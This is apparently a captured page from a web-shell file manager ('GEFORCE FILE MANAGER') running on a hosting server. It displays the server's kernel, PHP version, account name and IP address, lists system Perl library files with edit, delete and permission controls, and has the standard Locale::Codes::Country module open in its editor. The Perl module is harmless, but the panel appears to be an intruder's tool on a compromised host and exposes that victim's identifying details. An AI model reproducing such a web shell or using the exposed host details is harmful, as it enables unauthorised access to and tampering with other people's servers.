[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
perl5
/
vendor_perl
/
Locale
/
Codes
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 Changes.pod
26,351 B
SET
[ EDIT ]
|
[ DEL ]
📄 Constants.pm
6,305 B
SET
[ EDIT ]
|
[ DEL ]
📄 Country.pm
1,891 B
SET
[ EDIT ]
|
[ DEL ]
📄 Country.pod
3,171 B
SET
[ EDIT ]
|
[ DEL ]
📄 Country_Codes.pm
257,800 B
SET
[ EDIT ]
|
[ DEL ]
📄 Country_Retired.pm
28,972 B
SET
[ EDIT ]
|
[ DEL ]
📄 Currency.pm
1,912 B
SET
[ EDIT ]
|
[ DEL ]
📄 Currency.pod
3,202 B
SET
[ EDIT ]
|
[ DEL ]
📄 Currency_Codes.pm
50,994 B
SET
[ EDIT ]
|
[ DEL ]
📄 Currency_Retired.pm
8,136 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangExt.pm
1,891 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangExt.pod
3,171 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangExt_Codes.pm
51,227 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangExt_Retired.pm
731 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangFam.pm
1,891 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangFam.pod
3,171 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangFam_Codes.pm
24,888 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangFam_Retired.pm
413 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangVar.pm
1,891 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangVar.pod
3,171 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangVar_Codes.pm
25,694 B
SET
[ EDIT ]
|
[ DEL ]
📄 LangVar_Retired.pm
872 B
SET
[ EDIT ]
|
[ DEL ]
📄 Language.pm
1,912 B
SET
[ EDIT ]
|
[ DEL ]
📄 Language.pod
3,202 B
SET
[ EDIT ]
|
[ DEL ]
📄 Language_Codes.pm
1,606,252 B
SET
[ EDIT ]
|
[ DEL ]
📄 Language_Retired.pm
20,161 B
SET
[ EDIT ]
|
[ DEL ]
📄 Script.pm
1,870 B
SET
[ EDIT ]
|
[ DEL ]
📄 Script.pod
3,140 B
SET
[ EDIT ]
|
[ DEL ]
📄 Script_Codes.pm
64,522 B
SET
[ EDIT ]
|
[ DEL ]
📄 Script_Retired.pm
3,558 B
SET
[ EDIT ]
|
[ DEL ]
📄 Types.pod
12,027 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Country.pm
package Locale::Codes::Country; # Copyright (C) 2001 Canon Research Centre Europe (CRE). # Copyright (C) 2002-2009 Neil Bowers # Copyright (c) 2010-2018 Sullivan Beck # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. # This file was automatically generated. Any changes to this file will # be lost the next time 'gen_mods' is run. # Generated on: Wed May 30 10:22:15 EDT 2018 use strict; use warnings; require 5.006; use Exporter qw(import); our($VERSION,@EXPORT); $VERSION = '3.57'; ################################################################################ use if $] >= 5.027007, 'deprecate'; use Locale::Codes; use Locale::Codes::Constants; @EXPORT = qw( code2country country2code all_country_codes all_country_names country_code2code ); push(@EXPORT,@Locale::Codes::Constants::CONSTANTS_COUNTRY); our $obj = new Locale::Codes('country'); $obj->show_errors(0); sub show_errors { my($val) = @_; $obj->show_errors($val); } sub code2country { return $obj->code2name(@_); } sub country2code { return $obj->name2code(@_); } sub country_code2code { return $obj->code2code(@_); } sub all_country_codes { return $obj->all_codes(@_); } sub all_country_names { return $obj->all_names(@_); } sub rename_country { return $obj->rename_code(@_); } sub add_country { return $obj->add_code(@_); } sub delete_country { return $obj->delete_code(@_); } sub add_country_alias { return $obj->add_alias(@_); } sub delete_country_alias { return $obj->delete_alias(@_); } sub rename_country_code { return $obj->replace_code(@_); } sub add_country_code_alias { return $obj->add_code_alias(@_); } sub delete_country_code_alias { return $obj->delete_code_alias(@_); } 1;